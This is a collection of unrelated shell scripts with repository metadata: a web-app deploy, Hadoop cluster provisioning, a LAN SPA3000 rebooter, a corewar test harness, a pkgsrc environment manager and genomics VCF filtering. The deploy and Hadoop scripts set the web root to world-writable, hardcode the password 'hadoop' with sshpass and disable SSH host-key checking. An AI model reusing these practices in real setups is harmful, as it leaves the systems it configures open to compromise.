BullHacks3/DevSecops
|
/Bash_Script/Linux_Commands/test.sh
|
UTF-8
| 243
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
# For each command named in README1.md, pull the one-line summary from the
# NAME section of its man page and append "command | summary" to new.txt.
function command_descriptor()
{
# iterate whitespace-separated command names ($(...) replaces backticks;
# the word-splitting of the file contents is intentional here)
for i in $(cat README1.md);
do
# take the line after the NAME heading and blank the first two fields
# ("cmd -"), leaving just the description text
help=$(man "$i" | grep -i -A1 NAME | head -2 | tail -1 | awk '{$1=$2="";print $0}')
printf "%-10s \t \t | %s \n" "$i" "$help" >> new.txt
done
}
command_descriptor
| true
|
84fc0fd0529d1d7acc4f99352fc458b8b5d59f68
|
Shell
|
yank07/WPM
|
/produccion/production_deploy.sh
|
UTF-8
| 933
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Production deploy: restore the DB, fetch the project from GitHub, copy it
# into the apache document root and restart the server.
#restore the database into the production DB
echo Poblando la base de datos... Si se le solicita la contraseña del usuario postgres, ingresela
su postgres -c "psql -q WPMDB_prod < wpmdb.sql"
#create a directory and clone the project from git
echo Descargando proyecto de github
mkdir source
cd source
git clone https://github.com/yank07/WPM.git
#copy the settings.py tailored for the production DB
cd ..
cp settings.py ./source/WPM/WPM
# bug fix: ".source/..." was missing the slash after ".", so the jquery
# file was never copied into the checkout
cp jquery-1.11.0.min.js ./source/WPM/WPM/static/js
#copy the project into the apache document root
echo Copiando al root del apache...
cd source
sudo cp -R WPM /var/www/
cd /var/www
cd ./WPM/WPM/
sudo mkdir uploaded_files
cd uploaded_files
sudo mkdir tmp
cd /var/www
sudo chown -R www-data WPM
sudo chmod -R 777 WPM
sudo mkdir .matplotlib
sudo chmod -R 757 .matplotlib
#restart apache
echo Reiniciando el servidor apache...
sudo service apache2 restart
echo Listo! Abra el navegador e ingrese la direccion especificada
| true
|
ca89547c3dfd355e5010889618b37f556a1753d2
|
Shell
|
allardais/validwd
|
/tools/import_index.bash
|
UTF-8
| 743
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# Import the json index (index.csv) into the MySQL table `jsonindex`
# and report how long the import took.
source values.bash
echo -e "\n`date +%T` Выполняется импорт индекса json\n"
# Recreate the table and bulk-load the csv via LOAD DATA LOCAL INFILE.
echo "drop table if exists jsonindex; \
create table jsonindex ( \
item char (20) primary key, \
pos bigint, \
len int); \
load data local infile '"$WORK_FILES_PATH"index.csv' \
into table jsonindex \
fields terminated by ';' \
enclosed by '' \
lines terminated by '\n' \
(item, pos, len);" | \
mysql --user=$USER --password=$PASS --local-infile=1 $DB
# $SECONDS is the wall-clock time since the shell started
TIME=$SECONDS
let "SEC= TIME % 60"
let "MIN= (TIME / 60) % 60"
let "HOUR= TIME / 3600"
echo -e "\n`date +%T` Импорт индекса json выполнен за $HOUR ч. $MIN мин. $SEC сек.\n"
exit 0
| true
|
57e6908eb64db9b231a64400701b7d283fd28b40
|
Shell
|
elsom25/dotfiles
|
/script/clean
|
UTF-8
| 220
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
#
# install without user input
# Uninstall entry point: load the shared helpers and the uninstall
# routines, then remove everything the dotfiles installer created.
DOTFILES_ROOT="`pwd`"
source "${DOTFILES_ROOT}/script/base/common.sh"
source "${DOTFILES_ROOT}/script/base/uninstall.sh"
# abort on the first failing command from here on
set -e
echo ''
delete_all
echo ''
echo ' Cleaned!'
| true
|
55a274442fa19ff0e2ac301cac56801f5b4a444e
|
Shell
|
andrew19932/monitoring
|
/apache-exp.sh
|
UTF-8
| 2,411
| 3.3125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Install Go, build the Prometheus apache_exporter, register it as a
# systemd service, and enable Apache's mod_status endpoint for scraping.
cd /home/andrew
curl -O https://dl.google.com/go/go1.11.linux-amd64.tar.gz
sudo tar -C /usr/local -xvzf go1.11.linux-amd64.tar.gz
echo "export GOPATH=$HOME/go" >> ~/.profile
echo "export PATH=$PATH:/usr/local/go/bin" >> ~/.profile
source ~/.profile
go get -v github.com/Lusitaniae/apache_exporter
sudo cp ~/go/bin/apache_exporter /usr/sbin/
touch /etc/systemd/system/apache_exporter.service
# NOTE(review): `sudo cat << EOF > file` performs the redirection as the
# invoking user, not root -- this only works if the script already has
# write access to the target; confirm how this script is run.
sudo cat << EOF > /etc/systemd/system/apache_exporter.service
[Unit]
Description=Apache Exporter
[Service]
User=ubuntu
EnvironmentFile=/etc/sysconfig/apache_exporter
ExecStart=/usr/sbin/apache_exporter $OPTIONS
[Install]
WantedBy=multi-user.target
EOF
sudo mkdir -p /etc/sysconfig
sudo touch /etc/sysconfig/apache_exporter
#sudo cat << EOF > /etc/sysconfig/apache_exporter
#OPTIONS="-scrape_uri='http://127.0.0.1/server-status/?auto'"
#EOF
# keep the stock status.conf as an example, then write our own
sudo mv /etc/apache2/mods-enabled/status.conf /etc/apache2/mods-enabled/status.example
touch /etc/apache2/mods-enabled/status.conf
sudo cat << EOF > /etc/apache2/mods-enabled/status.conf
<IfModule mod_status.c>
# Allow server status reports generated by mod_status,
# with the URL of http://servername/server-status
# Uncomment and change the "192.0.2.0/24" to allow access from other hosts.
<Location /server-status>
SetHandler server-status
Require local
#Require ip 192.0.2.0/24
Require ip 127.0.0.1/32
</Location>
# Keep track of extended status information for each request
ExtendedStatus On
# Determine if mod_status displays the first 63 characters of a request or
# the last 63, assuming the request itself is greater than 63 chars.
# Default: Off
#SeeRequestTail On
<IfModule mod_proxy.c>
# Show Proxy LoadBalancer status in mod_status
ProxyStatus On
</IfModule>
</IfModule>
EOF
# add a rewrite exception so /server-status is not swallowed by the app
match='RewriteRule'
insert='RewriteCond %{REQUEST_URI} !^/server-status/?(.*)'
lms_file='/etc/apache2/sites-available/astria_lms.conf'
sed -i "s/$match/$match\n$insert/" $lms_file
#RewriteCond %{REQUEST_URI} !^/server-status/?(.*)
echo apache_exporter.service file is created
sudo systemctl daemon-reload
sudo systemctl enable apache_exporter.service
sudo systemctl start apache_exporter
echo Starting apache exporter...
sudo systemctl status apache_exporter
| true
|
f53ff9ed8d6aa96049ebd7ae763ac10dc2483bd4
|
Shell
|
remigermain/corewar
|
/script/vm_script_diff.sh
|
UTF-8
| 1,518
| 3.25
| 3
|
[] |
no_license
|
#!/bin/bash
# Compare our corewar VM's dump output against the reference implementation
# over a range of cycle counts, reporting the first divergence.
# Usage: script [cycle_start] [cycle_end] <champion.cor>
WORSE="0"
BEST="16777216"
COUNTER=$1
SUM="0"
ERROR="0"
if [[ $# -ne 3 ]]
then
echo -e "You need 3 params\nscript [cycle start] [cycle_end] <champion.cor>"
exit;
fi
if ! [[ "$1" =~ ^[0-9]+$ ]]
then
echo -e "your param 1 \"$1\" is not integers"
ERROR="1"
fi
if ! [[ "$2" =~ ^[0-9]+$ ]]
then
echo -e "your param 2 \"$2\" is not integers"
ERROR="1"
fi
# bug fix: the opening backtick of this command substitution was missing,
# which made the line a shell syntax error
RET=`echo -e $3 | grep ".cor" | wc -l | bc`
if [[ ${RET} -le 0 ]]
then
echo -e "The file is not a champions!"
ERROR="1"
fi
if [[ ${ERROR} = "1" ]]
then
exit;
fi
# build the VM if the binary is absent
if [ ! -f "corewar" ]
then
make ;
fi
echo "[ START ]\n"
# baseline diff at cycle 1
./corewar -d 1 -p $3 > .diff_core && ./subject_ressources/original_corewar -d 1 $3 > .diff_oricore
BASE=`diff .diff_core .diff_oricore | wc -l | bc`
echo "diff is $BASE\n"
while [[ ${COUNTER} -lt $2 ]]
do
./corewar -d $COUNTER -p $3 > .diff_core && ./subject_ressources/original_corewar -d $COUNTER $3 > .diff_oricore
MED=`diff .diff_core .diff_oricore | wc -l | bc`
echo -e "\033[1A\c"
echo -e "count = "${COUNTER}
# a change in the diff size means the dumps diverged at this cycle --
# unless the reference VM simply finished before this cycle count
if [[ ${MED} -ne $BASE ]]
then
TEST=`./subject_ressources/original_corewar -d 500000 $3 | wc -l | bc`
NOW=`./subject_ressources/original_corewar -d $COUNTER $3 | wc -l | bc`
if [[ ${TEST} -ne ${NOW} ]]
then
echo -e "[ ENDING ]\n[ KO ]count = "${COUNTER}
diff .diff_core .diff_oricore
else
echo -e "[ ENDING ]\nzaz vm ending !\n[ OK ]count = "${COUNTER}
fi
exit
fi
(( COUNTER += 1 ))
done
echo "[ ENDING ]\n[ OK ]\ncount = "${COUNTER}
rm -rf .diff_core .diff_oricore
| true
|
1f8782337e38dff7e2376b46a193b6e80358e079
|
Shell
|
dmsherazi/SPA3000-Rebooter
|
/spa-rebooter.sh
|
UTF-8
| 704
| 2.796875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#developed by Dost Muhammad Shah
# github.com/dmsherazi
# Reboots spa3000 by finding them using arp-sacn
# the script serches for cisco lynksis OUI 00:18:f8 ,00:18:39 and 00:14:bf
# This script should work with paswword protected SPA3000 as well.
# Tested with SPA 3000 with the following Software & Hardware versions
# Software Version: 3.1.20(GW) Hardware Version: 3.5.1(1448)
# This file is subject to the terms and conditions defined in
# file 'LICENSE.txt', which is part of this source code package.
# The reboot endpoint is http://<ip>/admin/reboot
PRE="http://"
SUFF="/admin/reboot"
# Scan the kernel ARP table for the Linksys OUIs and hit each device's
# reboot URL; the { } group keeps the while-loop reading from the pipe.
cat /proc/net/arp |egrep '00:18:f8|00:18:39|00:14:bf'| {
while read line
do
# first column of /proc/net/arp is the IP address
IP=`echo "$line" | awk '{ print $1 }'`
wget $PRE$IP$SUFF
done
}
| true
|
76559a8b754662a8b50bd2496ff7401994a92a90
|
Shell
|
esteba61/Hadoop-provision
|
/scripts/setup-nodemaster.sh
|
UTF-8
| 5,558
| 3.125
| 3
|
[] |
no_license
|
#!/usr/bin/bash
function sudoAdmin {
sudo -i
}
function hadoopUser {
useradd hadoop
echo -e "hadoop" | (passwd --stdin hadoop)
}
function installTools {
yum install -y java-1.8.0-openjdk-devel sshpass
cat > /etc/hosts <<EOF
192.168.92.10 nodemasterx
192.168.92.11 nodea
192.168.92.12 nodeb
EOF
}
function sshkey {
sshpass -p 'hadoop' ssh -o StrictHostKeyChecking=no hadoop@nodemasterx 'ssh-keygen -b 4096 -N "" -f /home/hadoop/.ssh/id_rsa'
sshpass -p 'hadoop' ssh-copy-id -o StrictHostKeyChecking=no -i /home/hadoop/.ssh/id_rsa.pub hadoop@nodemasterx
sshpass -p 'hadoop' ssh-copy-id -o StrictHostKeyChecking=no -i /home/hadoop/.ssh/id_rsa.pub hadoop@nodea
sshpass -p 'hadoop' ssh-copy-id -o StrictHostKeyChecking=no -i /home/hadoop/.ssh/id_rsa.pub hadoop@nodeb
}
function downloadHadoop {
su -l hadoop -c "wget http://apache.uniminuto.edu/hadoop/common/hadoop-3.0.2/hadoop-3.0.2.tar.gz > .null;
tar -xzf hadoop-3.0.2.tar.gz > .null;
mv hadoop-3.0.2 hadoop"
}
function setEnvVar {
echo "export HADOOP_HOME=/home/hadoop/hadoop
export HADOOP_MAPRED_HOME=\$HADOOP_HOME
export HADOOP_COMMON_HOME=\$HADOOP_HOME
export HADOOP_HDFS_HOME=\$HADOOP_HOME
export YARN_HOME=\$HADOOP_HOME
export HADOOP_COMMON_LIB_NATIVE_DIR=\$HADOOP_HOME/lib/native
export PATH=$PATH:$HADOOP_HOME/sbin:\$HADOOP_HOME/bin
export LD_LIBRARY_PATH=/home/hadoop/hadoop/lib/native/:\$LD_LIBRARY_PATH
export HADOOP_INSTALL=\$HADOOP_HOME
PATH=/home/hadoop/hadoop/bin:/home/hadoop/hadoop/sbin:\$PATH" >> /home/hadoop/.bashrc
source /home/hadoop/.bashrc
sed -i "s/# export JAVA_HOME=.*/export JAVA_HOME=\/usr\/lib\/jvm\/java-1.8.0-openjdk\/jre/" /home/hadoop/hadoop/etc/hadoop/hadoop-env.sh
}
function setCore-site {
sed -i "s/<configuration>.*/<configuration>\n <property>\n <name>fs.default.name<\/name>\n <value>hdfs:\/\/nodemasterx:9000<\/value>\n <\/property>/" /home/hadoop/hadoop/etc/hadoop/core-site.xml
}
function setHdfs-site {
sed -i "s/<configuration>.*/<configuration>\n <property>\n <name>dfs.namenode.name.dir<\/name>\n <value>\/home\/hadoop\/data\/nameNode<\/value>\n <\/property>\n <property>\n <name>dfs.datanode.data.dir<\/name>\n <value>\/home\/hadoop\/data\/dataNode<\/value>\n <\/property>\n <property>\n <name>dfs.replication<\/name>\n <value>1<\/value>\n <\/property>/" /home/hadoop/hadoop/etc/hadoop/hdfs-site.xml
}
function setMapred-site {
# Configure MapReduce to run on YARN, set HADOOP_MAPRED_HOME for the AM
# and map/reduce task environments, and cap task memory (512/256/256 MB),
# all injected right after the opening <configuration> tag.
sed -i "s/<configuration>.*/<configuration>\n <property>\n <name>yarn.app.mapreduce.am.env<\/name>\n <value>HADOOP_MAPRED_HOME=\/home\/hadoop\/hadoop<\/value>\n <\/property>\n <property>\n <name>mapreduce.map.env<\/name>\n <value>HADOOP_MAPRED_HOME=\/home\/hadoop\/hadoop<\/value>\n <\/property>\n <property>\n <name>mapreduce.reduce.env<\/name>\n <value>HADOOP_MAPRED_HOME=\/home\/hadoop\/hadoop<\/value>\n <\/property>\n <property>\n <name>mapreduce.framework.name<\/name>\n <value>yarn<\/value>\n <\/property>\n <property>\n <name>yarn.app.mapreduce.am.resource.mb<\/name>\n <value>512<\/value>\n <\/property>\n <property>\n <name>mapreduce.map.memory.mb<\/name>\n <value>256<\/value>\n <\/property>\n <property>\n <name>mapreduce.reduce.memory.mb<\/name>\n <value>256<\/value>\n <\/property>/" /home/hadoop/hadoop/etc/hadoop/mapred-site.xml
}
function setYarn-site {
# Configure YARN: disable ACLs, point workers at the resourcemanager on
# nodemasterx, enable the mapreduce shuffle service, set NodeManager and
# scheduler memory limits (1536/1536/128 MB), and disable the virtual
# memory check, injected right after the opening <configuration> tag.
sed -i "s/<configuration>.*/<configuration>\n <property>\n <name>yarn.acl.enable<\/name>\n <value>0<\/value>\n <\/property>\n <property>\n <name>yarn.resourcemanager.hostname<\/name>\n <value>nodemasterx<\/value>\n <\/property>\n <property>\n <name>yarn.nodemanager.aux-services<\/name>\n <value>mapreduce_shuffle<\/value>\n <\/property>\n <property>\n <name>yarn.nodemanager.resource.memory-mb<\/name>\n <value>1536<\/value>\n <\/property>\n <property>\n <name>yarn.scheduler.maximum-allocation-mb<\/name>\n <value>1536<\/value>\n <\/property>\n <property>\n <name>yarn.scheduler.minimum-allocation-mb<\/name>\n <value>128<\/value>\n <\/property>\n <property>\n <name>yarn.nodemanager.vmem-check-enabled<\/name>\n <value>false<\/value>\n <\/property>/" /home/hadoop/hadoop/etc/hadoop/yarn-site.xml
}
function addWorkers {
# Register the two worker hostnames (one per line) in Hadoop's workers
# file so start-dfs.sh/start-yarn.sh launch daemons on them.
printf '%s\n' nodea nodeb >> /home/hadoop/hadoop/etc/hadoop/workers
}
function setupWorkers {
# Ship the Hadoop tarball and the master's configuration to both workers
# and unpack remotely.
# NOTE(review): assumes hadoop-*.tar.gz matches exactly one file in the
# hadoop user's home directory -- TODO confirm.
su -l hadoop -c "scp -o StrictHostKeyChecking=no hadoop-*.tar.gz hadoop@nodea:/home/hadoop"
su -l hadoop -c "scp -o StrictHostKeyChecking=no hadoop-*.tar.gz hadoop@nodeb:/home/hadoop"
for node in nodea nodeb; do
# Unpack on the worker and rename to the canonical 'hadoop' directory.
sshpass -p 'hadoop' ssh -o StrictHostKeyChecking=no hadoop@$node 'tar -xzf hadoop-3.0.2.tar.gz; mv hadoop-3.0.2 hadoop';
done
# Overwrite worker configs with the master's etc/hadoop tree.
su -l hadoop -c "scp -o StrictHostKeyChecking=no -r /home/hadoop/hadoop/etc/hadoop/* hadoop@nodea:/home/hadoop/hadoop/etc/hadoop/"
su -l hadoop -c "scp -o StrictHostKeyChecking=no -r /home/hadoop/hadoop/etc/hadoop/* hadoop@nodeb:/home/hadoop/hadoop/etc/hadoop/"
}
function HDFSandDFS {
# Format the namenode (destructive for any existing HDFS data) and start
# the HDFS and YARN daemons as the hadoop user. Relies on the PATH
# entries written to .bashrc by setEnvVar.
su -l hadoop -c "hdfs namenode -format"
su -l hadoop -c "start-dfs.sh"
su -l hadoop -c "start-yarn.sh"
}
echo -e "START SETUP"
echo -e "------SUDOADMIN------"
sudoAdmin
echo -e "------HADOOPUSER------"
hadoopUser
echo -e "------INSTALLTOOLS------"
installTools
echo -e "------SSHKEY------"
sshkey
echo -e "------DOWNLOADHADOOP------"
downloadHadoop
echo -e "------SETENVVAR------"
setEnvVar
echo -e "------SETCORE-SITE------"
setCore-site
echo -e "------SETHDFS-SITE------"
setHdfs-site
echo -e "------SETMAPRED-SITE------"
setMapred-site
echo -e "------SETYARN-SITE------"
setYarn-site
echo -e "------ADDWORKES------"
addWorkers
echo -e "------SETUPWORKES------"
setupWorkers
echo -e "------HDFSANDDFS------"
HDFSandDFS
echo -e "END ALL"
| true
|
85352e794b2e38e5accc787c267ea02e52afee2b
|
Shell
|
TomTheTornado/COMS327
|
/Turnin.sh
|
UTF-8
| 1,324
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Place this in a file named: Turnin.sh
#
# To run type: ./Turnin.sh
#
# If it says permission denied then you will need to change
# the permissions with the command: chmod 777 Turnin.sh
#
set -eu;
read -p "Enter Firstname: " FNAME;
read -p "Enter Lastname: " LNAME;
read -p "Enter Assignment Number: " ASSIGNMENT_NUMBER;
read -p "Directory to Zip: " ASSIGNMENT;
# FIX: every expansion below is now quoted. Unquoted [ -z $VAR ] breaks
# (or mis-evaluates) when the value contains spaces, and unquoted paths
# break cd/cp/tar/rm for directory names with whitespace.
if [ -z "$FNAME" ]
then
    echo "Please enter your firstname!";
    exit 1;
fi
if [ -z "$LNAME" ]
then
    echo "Please enter your lastname!"
    exit 1
fi
if [ -z "$ASSIGNMENT_NUMBER" ]
then
    echo "Please supply an assignment number!"
    exit 1
fi
if [ -z "$ASSIGNMENT" ]
then
    echo "Please enter an assignment directory!"
    exit 1
fi
# The assignment directory must contain the required deliverables.
if [ ! -f "$ASSIGNMENT/CHANGELOG" ]
then
    echo "Changelog not found!"
    exit 1
fi
if [ ! -f "$ASSIGNMENT/README" ]
then
    echo "ReadMe file not found!"
    exit 1
fi
if [ ! -f "$ASSIGNMENT/Makefile" ]
then
    echo "Makefile not found!"
    exit 1
fi
# Canonical turn-in name, computed once.
PKG="${LNAME}_${FNAME}.assignment-${ASSIGNMENT_NUMBER}"
#clean directory
cd "$ASSIGNMENT"
make clean
cd ..
# Copy directory
cp -R "$ASSIGNMENT/" "$PKG"
#tar the directory
tar cvfz "$PKG.tar.gz" "$PKG"
# remove the temp directory
rm -r "$PKG"
| true
|
35a5f29d11f881796b19680ea4fd6f7bd2f37d59
|
Shell
|
Noremac201/cs310
|
/505/'
|
UTF-8
| 442
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
gen_rand () {
  # Rebuild input.dat in the current directory: a header line "4", a
  # blank line, then a 4x4 grid of random values in 1..10, each number
  # followed by a blank line (34 lines total).
  echo gen_rands
  # FIX: -f so the first run (no pre-existing input.dat) does not error.
  rm -f input.dat
  echo 4 >> input.dat
  printf "\n" >> input.dat
  # Brace ranges instead of spawning `seq` twice per call.
  for i in {1..4}
  do
    for n in {1..4}
    do
      echo $(( ( RANDOM % 10 ) + 1 )) >> input.dat
      printf "\n" >> input.dat
    done
  done
}
# Generate a fresh random board, run the solver, and archive boards that
# yield more than one solution.
gen_rand
# stdout discarded; stderr (appended to data.dat) carries the result.
./main < input.dat 1>>/dev/null 2>>data.dat
# presumably ./main prints a solution count as its final line -- TODO confirm
NBS="$(tail -1 data.dat)"
if [ $NBS -gt 1 ]
then
cat input.dat >> answers.txt
printf "\n" >> answers.txt
fi
| true
|
798510eb86e3bf61bb9e72be8bcd6e5297ac0042
|
Shell
|
drscream/tm-env
|
/bin/scripts/vpkg
|
UTF-8
| 3,853
| 4.21875
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
# vpkg by tm@core.io
# Manage virtual pkgsrc environments easily with an simple shell script. To
# have easy commands feel free to create shell aliases.
# Defaults
VPKG_DIR=${HOME}/.vpkg
VPKG_GIT="git@github.com:NetBSD/pkgsrc.git"
# Personal configuration file for overwrite defaults
test -f "${HOME}/.vpkgrc" && . "${HOME}/.vpkgrc"
_help() {
  # Print CLI usage plus the on/off helpers available when sourced.
  # FIX: help previously advertised '-d NAME' for delete, but the getopts
  # loop at the bottom of this script actually implements '-r NAME'.
  echo "${0} [-l|-c|-r] [NAME]"
  echo
  echo "OPTIONS:"
  echo " -l : List existing pkgsrc virtualenvs"
  echo " -c NAME : Create new pkgsrc virtualenv for NAME"
  echo " -r NAME : Delete existing pkgsrc virtualenv for NAME"
  echo
  echo "HELP:"
  echo " source ${0}"
  echo " on NAME : Switch to pkgsrc virtualenv, by setting PATH and VPKG"
  echo " off : Disable current virtualenv, reset PATH and unset VPKG"
}
_die() {
  # Report an error on stdout as "ERROR: <message...>" and terminate the
  # script with the given exit code.
  local rc="$1"
  shift
  echo "ERROR: ${*}"
  exit "$rc"
}
# Create pkgsrc source folder and clone remote data. Switching branch if remote
# branch is available, otherwise use trunk.
# Dies with code 1 if the environment NAME already exists.
_create() {
  local name=${1}
  local srcdir=${VPKG_DIR}/${name}/src
  if ! test -d "${srcdir}"; then
    # create working directory
    mkdir -p "${srcdir}"
    # cloning source code
    git clone ${VPKG_GIT} "${srcdir}"
    # switching branch / creating branch
    cd "${srcdir}" || return 1
    # Reuse an existing remote branch whose name matches NAME
    # (case-insensitive grep); otherwise branch off the default head.
    if remote_branch=$(git branch -r | grep -i "${name}"); then
      git checkout -b "${name}" "${remote_branch}"
    else
      git checkout -b "${name}"
    fi
  else
    _die 1 "'${name}' already exists!"
  fi
}
# Delete the vpkg folder based on the name. It will delete the binary data and
# the source folder.
# Prompts for confirmation; anything but y/Y exits without deleting.
_remove() {
  local name=${1}
  if test -d "${VPKG_DIR}/${name}"; then
    while true; do
      read -rp "Do you really like to delete \`${name}\`? [y|N] " yn
      case $yn in
        # ${VPKG_DIR:?} guards against rm -r on "/<name>" if VPKG_DIR
        # were ever empty.
        [Yy]* ) rm -r "${VPKG_DIR:?}/${name}"; break ;;
        * ) exit ;;
      esac
    done
  else
    _die 2 "'${name}' does not exists!"
  fi
}
# Emit the mk.conf fragment consumed by the pkgsrc bootstrap for NAME
# (developer defaults plus per-environment work/package/distfile dirs).
# The <<- here-doc strips leading *tabs* only, so the body lines below
# must keep their original indentation unchanged.
_bootstrap_mk_frag() {
  local name=${1}
  cat <<-__MKFRAGEOM__
	# Developer Defaults
	PKG_DEVELOPER= yes
	ALLOW_VULNERABLE_PACKAGES= yes
	SKIP_LICENSE_CHECK= yes
	# Use extra folders for workdir, packages and distfiles
	WRKOBJDIR= ${VPKG_DIR}/${name}/workdir
	PACKAGES= ${VPKG_DIR}/${name}/packages
	DISTDIR= ${VPKG_DIR}/${name}/distfiles
	# Modular X11
	X11_TYPE= modular
	__MKFRAGEOM__
}
# Run the pkgsrc bootstrap for NAME: unprivileged 64-bit build with
# cwrappers, installing into ${VPKG_DIR}/NAME/pkg. Dies with code 2 if
# the source tree (created by _create) is missing.
_bootstrap() {
  local name=${1}
  local srcdir=${VPKG_DIR}/${name}/src
  if test -d "${srcdir}"; then
    cd "${srcdir}" || return 1
    # --mk-fragment reads our generated mk.conf via process substitution.
    ./bootstrap/bootstrap \
      --abi 64 \
      --cwrappers yes \
      --make-jobs 8 \
      --mk-fragment <(_bootstrap_mk_frag "${name}") \
      --prefer-pkgsrc yes \
      --prefix "${VPKG_DIR}/${name}/pkg" \
      --unprivileged \
      --varbase "${VPKG_DIR}/${name}/pkg/var" \
      --workdir "${VPKG_DIR}/${name}/workdir"
  else
    _die 2 "'${name}' does not exists!"
  fi
}
#
on() {
  # Activate virtualenv NAME: prepend its bin/sbin to PATH, export VPKG
  # and MANPATH, and define a matching off() that undoes the changes.
  # With no argument, just list the available environments.
  local name=${1}
  if [ -z "${name}" ]; then
    ls "${VPKG_DIR}/"
    return 0
  fi
  if ! test -d "${VPKG_DIR}/${name}/pkg"; then
    echo "ERROR: '${name}' does not exists!"
    return 1
  fi
  # Deactivate a previously sourced environment switcher, if present.
  if type disable &>/dev/null; then
    disable
    unset -f disable >/dev/null 2>&1
  fi
  export VPKG=${name}
  export __OLDPATH=${PATH}
  export PATH=${VPKG_DIR}/${name}/pkg/bin:${VPKG_DIR}/${name}/pkg/sbin:${PATH}
  # FIX: was ${VPKG_DIR}/name/pkg/man (literal "name"), which pointed
  # MANPATH at a non-existent directory for every environment.
  export MANPATH=${VPKG_DIR}/${name}/pkg/man
  eval 'off() {
    export PATH=${__OLDPATH}
    unset VPKG MANPATH __OLDPATH
  }'
}
# Command-line dispatch: -l list envs, -c NAME create+bootstrap,
# -r NAME remove; anything else prints usage.
while getopts ':lc:r:' arg; do
  case "${arg}" in
    l)
      ls "${VPKG_DIR}/"
      ;;
    c)
      _create "${OPTARG}"
      _bootstrap "${OPTARG}"
      ;;
    r)
      _remove "${OPTARG}"
      ;;
    *)
      _help
      ;;
  esac
done
# (return ...) only succeeds when this file is being sourced; when
# executed directly with no options, fall back to printing usage.
(return 0 2>/dev/null) || if (( OPTIND == 1 )); then _help; fi
# Unset all not required functions and global variables because the script
# could be sourced as well to provide a switch function.
unset -f _help
unset -f _die
unset -f _create
unset -f _bootstrap_mk_frag
unset -f _bootstrap
unset -f _remove
unset VPKG_GIT
# vim:sw=2:ts=2
| true
|
3023fcf32397defc3270702e2c31c8b46b95ccbf
|
Shell
|
Chengjian-Tang/owb-mirror
|
/tags/Doduo_1.1/BAL/scripts.old/run_create_all.sh
|
UTF-8
| 2,409
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/bash
#takes input files (and path and module) from list_BI.txt file
#generate BI/BC files
#execute: "cat non_generatedBI_files.txt | sort -u" to see the list of input files that can't generate a BI
#takes only the $1 first entries (if empty, takes 20)
nb=$1
if [ -z "$nb" ];
then
nb=20
fi
HEAD="head -n $nb"
FILTER="ALL"
if ! [ -z "$2" ];
then
if [ "$2" == "BI" ];
then
FILTER="BI"
elif [ "$2" == "BC" ];
then
FILTER="BC"
fi
fi
# Read "<path> <workfile> <fname>" triples (comments and blank lines
# stripped, truncated to $nb entries) and generate BI or BC files based
# on whether the path contains /Interfaces/ or /Concretizations/.
cat platform_files_list.txt | egrep -v "^#" | egrep -v "^$" | $HEAD | while read p wk fname
do
# echo "[$p] [$wk] [$fname]"
	file="$wk"
	if echo "$p" | grep -q "/Interfaces/"
	then
		if [ "$FILTER" != "BC" ]
		then
			# module = path component after "Interfaces/"; path = prefix before it.
			module=`echo "$p" | sed 's/^.*Interfaces\/\(.*\)\/[^\/]*$/\1/'`
			path=`echo "$p" | sed 's/Interfaces\/.*$//'`
#			echo "**** file=[$file] path=[$path] module=[$module]"
			CMD="./bal_create_BI.sh $file $path $module $fname"
			echo "+++ execute: $CMD"
			$CMD
		fi
	elif echo "$p" | grep -q "/Concretizations/"
	then
		if [ "$FILTER" != "BI" ]
		then
			# impl = last path component; module = component after "Concretizations/".
			impl=`echo "$p" | sed 's/^.*\///'`
			module=`echo "$p" | sed 's/.*\/Concretizations\/\(.*\)\/[^\/]*$/\1/'`
			path=`echo "$p" | sed 's/Concretizations\/.*$//'`
#			echo "BC not implemented for now: **** file=[$file] path=[$path] module=[$module] impl=[$impl]"
			CMD="./bal_create_BC.sh $file $path $module $impl $fname"
			echo "+++ execute: $CMD"
			$CMD
		fi
	else
		echo "WARN: $p skiped: doesn't contain valid keyword (Interfaces/Concretizations)"
	fi
done
#do next stages by hand
#exit 0
echo
echo "################ get defined class names ################"
echo
#once all BI are created, get class/types names that must be changed:
./getDefinedClassesName.sh
echo
echo "################ update defined class names ################"
echo
#and search/replace all of them with BI starting names
./updateDefinedClassesName.sh 2>&1
echo
echo "################ update defined BI includes ################"
echo
#and search/replace all of them with BI starting names
./updateBIIncludes.sh 2>&1
echo
echo "############## reparent BI to BC ##########################"
echo
./makeBIheritBC.sh 2>&1
echo
echo "############## PostProcess for debugging ##########################"
echo
./postProcessDebug.sh 2>&1
#work directly on ../
#echo
#echo "################ propagate all .h .cpp to right position ################"
#echo
#and finally propagate all
#./propageAll.sh
| true
|
d7d0054db45f492ef196685c67a21e2d164504e8
|
Shell
|
maiziex/10X_project
|
/src/extract_gold_locus.sh
|
UTF-8
| 4,080
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/bash
############################# cut chromosome for three files ################################
for i in {1..22}
do
chr_num=$i
output_prefix="NA12878_gold_pos_chr"
output_suffix=".vcf"
output_name=$output_prefix$i$output_suffix
cat /scail/u/xzhou15/CancerProj_10X/NA12878_GIAB_highconf_IllFB-IllGATKHC-CG-Ion-Solid_ALLCHROM_v3.2.2_highconf.vcf | awk '{if($1=="'$chr_num'") print $2}' > $output_name
done
for i in {1..22}
do
chr="chr"
chr_num=$chr$i
output_prefix="phase_convert_chr"
output_suffix=".vcf"
output_name=$output_prefix$i$output_suffix
cat /scail/u/xzhou15/CancerProj_10X/whatshap_results/phased_convert.vcf | awk '{if($1=="'$chr_num'") print $0}' > $output_name
done
for i in {1..22}
do
chr="chr"
chr_num=$chr$i
output_prefix="10x_phased_chr"
output_suffix=".vcf"
output_name=$output_prefix$i$output_suffix
cat /scail/u/xzhou15/CancerProj_10X/phasedvcf/merge_NA12878_forwhatshap.vcf | awk '{if($1=="'$chr_num'") print $0}' > $output_name
done
############################# only select gold loci ################################
for i in {1..22}
do
input_prefix="phase_convert_chr"
input_suffix=".vcf"
input_name=$input_prefix$i$input_suffix
input2_prefix="NA12878_gold_pos_chr"
input2_suffix=".vcf"
